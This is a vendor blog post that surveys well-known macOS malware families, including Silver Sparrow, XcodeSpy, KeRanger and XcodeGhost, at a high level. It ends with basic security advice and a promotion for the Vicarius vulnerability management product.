In the first few weeks of the Covid-19 pandemic, we saw lots of businesses invest in VPN software and new hardware as they equipped employees to work from home. In some locations, some organizations purchased Macbooks for their employees to facilitate their work from home.
Now that working from home (WFH) is part of our daily activities, there is a growing need to know about Mac cyber attacks, Apple security threats, and to remind employees of effective security procedures on all platforms which include MacOS, Apple products and Macintosh.
Apple’s platform seems to have enjoyed strong sales as organizations upgraded for work from home. However, even with adequate cybersecurity against Mac threats and attacks against Mac devices, there is a need to keep your Mac protected at all costs.
The Mac is also vulnerable to malware, spyware, ransomware, and hacking, and the rate of Mac cyber attacks is increasing. Most of the malware that is affecting Macs depends on user error, while the majority of the attacks are adware rather than something more threatening.
What Are The Top Cyber Attacks Against Mac?
-
Silver Sparrow
Security firm Red Canary discovered malware targeting Macs equipped with the M1 processor. The malware is named Silver Sparrow and uses the MacOS Installer Javascript API to execute commands. It's unknown to what extent Silver Sparrow poses a threat to Mac. Nevertheless, according to Malwarebytes, Silver Sparrow has already infected thousands of MacOS systems in different countries. Most of the infected Macs are in the US, Canada, UK, Germany and France. It is unclear how many of these are M1 Macs.
-
XcodeSpy
A Trojan hidden in Xcode projects in GitHub had the potential to spread among the Macs of iOS developers. Once installed, a malicious script runs an "EggShell backdoor". Once open, the Mac's camera, keyboard and microphone can be hijacked and files can be sent to the attacker. -
FakeFileOpener
Malwarebytes uses the name FakeFileOpener to describe applications that advertise potentially unwanted programs (PUPs). These tend to be system optimizers. You may see a pop-up suggesting that you don't have software to open an app. For instance, a message offering to help you locate an app on the internet. Or you may see a warning that you have been infected with different viruses inviting you to use apps such as Mac Adware Remover, Mac Space Reviver or Advanced Mac Cleaner.
-
Generic.Suspicious
These accounted for more than 80% of cases. However, rather than being one rampant case of malware, this is Malwarebytes’ name for any detection that was deemed to be suspicious behavior. This could be an attempt to run concealed Python or a shellcode.
-
KeRanger
One of the first ransomware within the Mac world, this malware started life with a valid Mac Developer ID. The malware will encrypt multiple file types and includes a process for pushing the ransom README file to the targeted user. Mitigation includes updated systems but also offline backups as per all ransomware defenses.
-
CallMe
This is a malware for the Mac realm, opening a backdoor onto infected systems that can be exploited by its command and control server. Dropped through malicious Microsoft Office attachments, the vulnerability has been patched for modern-day versions of Office software and MacOS. Users on those setups are protected against cyber attacks.
-
XcodeGhost
Targeting both iOS and Mac, this compiler malware is known as “the first large-scale attack on Apple’s App Store.” With wider attacks and espionage in mind, the malware targets, captures and pulls confidential information from an infected machine. Its infection of secure apps serves as a huge warning when pulling apps from relatively unknown sources.
-
LaoShu
A remote access Trojan that exploits infected PDF files to spread its payload. The malware will look for some particular types of files, compressing those into an exfiltration zip file that can be pulled from the machine. While keeping systems updated, this malware also calls for good email behavior and user training, which include avoidance of unknown attachments.
Conclusion
MacOS cyber attacks have come a long way. However, the era of explosive growth seems to be behind us, and we can’t help but notice the reduction in the activity of cybercriminals on Mac.
The owners of iMacs and MacBook have never been considered priority targets compared to Windows users since the latter has always been more profitable for attackers.
Additionally, there are a larger number of both known and unknown exploits for Windows. When combined with the fact that Windows users tend to install updates occasionally, this makes it more convenient and easier for cyber attackers to infect Windows systems.
To keep your devices on MacOS safe against cyber attacks, IT security experts recommend the following:
- Try to keep MacOS and all of your apps up to date
- Use a reliable security solution that delivers advanced protection on Mac as well as on PC and mobile devices
- Use only legitimate software, downloaded from official web pages or installed from the Mac App Store.
- If you need to access your iCloud to find your phone when it is lost, for example, use only the official website.
- Download and install apps only from official resources such as the App store.
If you need a cybersecurity tool to protect against Mac cyber attacks and software that can protect MacOS from cyber criminals, you need Vicarius.
Vicarius is a vulnerability management software that targets cybersecurity officers as well as IT managers and operators from the U.S. market.
Photo by Alexander Shatov on Unsplash